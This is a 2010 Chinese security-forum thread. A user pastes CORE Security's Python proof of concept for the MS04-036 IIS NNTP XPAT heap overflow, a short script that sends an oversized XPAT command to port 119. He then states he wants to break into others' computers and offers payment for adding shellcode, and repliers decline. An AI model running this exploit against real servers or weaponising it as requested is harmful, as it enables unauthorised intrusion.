首页
社区
课程
招聘
[旧帖] 求助:ms04036 0.00雪花
发表于: 2010-3-25 19:08 4063

[旧帖] 求助:ms04036 0.00雪花

2010-3-25 19:08
4063
#--
# IIS NNTP Service XPAT command heap overflow proof of concept
#
# Author:
#    Lucas Lavarello (lucas at coresecurity dot com)
#    Juliano Rizzo   (juliano at coresecurity dot com)
#
# Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc.
# All rights reserved.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE
# FOR ANY DIRECT,  INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF
# THIS SOFTWARE
#
# www coresecurity com
#--
from socket import *

host = "127.0.0.1"
pat = "C"*1946  + " " + "X"*10

newsgroup = "control.newgroup"

sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, 119))

print sock.recv(512)

sock.send("group %s\x0d\x0a" % newsgroup)

print sock.recv(512)

sock.send("xpat From 1-9 %s \x0d\x0a" % pat)

这是我搜到的MS04036代码,帮忙一下  这程序怎么才能编出来  利用  测试一下  谢谢了

[招生]系统0day安全班,企业级设备固件漏洞挖掘,Linux平台漏洞挖掘!

收藏
点赞
支持
分享
最新回复 (5)
雪    币: 928
活跃值: (26)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
2
你这个应当是python语言写的exp,这个是不需要编译的脚本语言(类似于perl)。
装个python,把这段代码保存为一个.py的文件,然后用python来直译、执行它就OK了。
试试看吧?
2010-3-25 19:52
0
雪    币: 10
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
不是  我想用这个  入侵别人电脑   可是 SHELLCODE 在那?  你能帮我调一下吗?要成功了  我把钱给你!
谢谢了!~~~
2010-3-25 20:12
0
雪    币: 928
活跃值: (26)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
4
非常抱歉,原本以为可以给你些技术学习上的帮助,现在看来我理解错了;那我真的帮不了你,希望你谅解,对不起。另外我也不需要钱。

提示:你所需要的都在你的代码里。祝好!
2010-3-25 21:23
0
雪    币: 401
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
能用这个东西入侵的电脑根本没必要用这个入侵。
2010-3-25 21:37
0
雪    币: 364
活跃值: (91)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
6
coolfrog    赞一个!
2010-3-25 21:47
0
游客
登录 | 注册 方可回帖
返回

账号登录
验证码登录

忘记密码?
没有账号?立即免费注册
// // 统计代码